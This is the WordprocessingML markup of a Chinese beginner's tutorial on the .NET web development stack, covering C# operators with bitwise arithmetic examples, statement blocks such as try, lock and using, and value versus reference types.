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widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="6" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0" w:line="26" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="顶部"/>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK "http://www.cnblogs.com/1996V/p/7700087.html"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.Net Web开发技术栈</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:widowControl/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="526" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有很多朋友有的因为兴趣，有的因为生计而走向了.Net中，有很多朋友想学，但是又不知道怎么学，学什么，怎么系统的学，为此我以我微薄之力总结归纳写了一篇.Net web开发技术栈，以此帮助那些想学，却不知从何起的朋友。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:widowControl/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="526" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>本文整理了当前企业web开发中的管理系统，商城等系统的常用开发技术栈。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b/>
        </w:rPr>
        <w:t>C#常见运算符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一元运算符（+、-、!、~、++、--）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>算术运算符（*、/、%、+ 、 – ）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>移位运算符（&lt;&lt; 、&gt;&gt; ）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:firstLine="700" w:firstLineChars="350"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>左位移相当于乘以2的位移次方，右位移相当于除以2的位移次方，向下取整。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:firstLine="735" w:firstLineChars="350"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>关系和类型测试运算符（==、!=、&lt;、&gt;、&lt;=、&gt;=、is 和 as）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运算符用于判断实例是否与指定类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>兼容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，兼容指的是该实例的类型或父类型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运算符执行引用类型的转换，如果类型兼容则返回实例，否则返回null。相比起用括号来进行强制转换，这种方式更加高效，因为这种方式不会抛出异常，而抛出异常会消耗大量的CPU资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>逻辑运算符（&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(位与)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(位异或)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 |</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(位或)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;是按位运算，如果对应的位都是1则是1，否则是0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：byte a = 12,b = 7;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yte r = a &amp; b;     =&gt;    0000 1100   //12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                             0000 0111   //7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                            -------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                             0000 0100   //4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>|也是二进制运算符，如果对应的位有一个是1则是1，否则是0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：byte a = 11,b = 7;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">yte r = a | b;     =&gt;  0000 1100 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                          0000 0111</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                          ---------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                          0000 1111  //15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>^:如果两个数字相同则为0，否则为1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：byte a = 11,b = 7;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">yte r = a ^ b;     =&gt;  0000 1100 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                          0000 0111</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                          ---------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                          0000 1011  //11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>条件逻辑运算符（&amp;&amp; 和 || ）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>空合并运算符（??）条件运算符（它也称为三元运算符，?: ）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>赋值运算符（=、+=、-=、!=、/=、&amp;=、|=）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>什么是表达式？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450" w:firstLine="300" w:firstLineChars="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表达式是由运算符和运算对象组成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>单独的一个运算对象（常量/变量）也可以叫做表达式，这是最简答的表达式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>eg：4,4+2，c = 7+5,3&gt;5，</w:t>
      </w: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C#常见语句块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360" w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Try（用于捕捉在块的执行期间发生的各种异常）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360" w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Checked 语句和 Unchecked（用于控制整型算术运算和转换的溢出检查上下文）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360" w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lock（获取某个给定对象的互斥锁，执行一个语句，然后释放该锁）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360" w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Using(获取一个或多个资源，执行一个语句，然后释放该资源)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>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变量与常量</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
        <w:t>C#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
        <w:t>可以分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>值类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>引用类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
        <w:t>，值类型又可以分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>简单类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>复杂类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值类型   =&gt; 简单类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        =&gt;整数类型/基元类型(byte,short,int,long)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>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=&gt;浮点类型(float,double)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>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=&gt;布尔类型(bool)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:ind w:firstLine="945" w:firstLineChars="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=&gt; 复杂类型(Enum,struct)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用类型 =&gt; Array,String,Class,delegate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
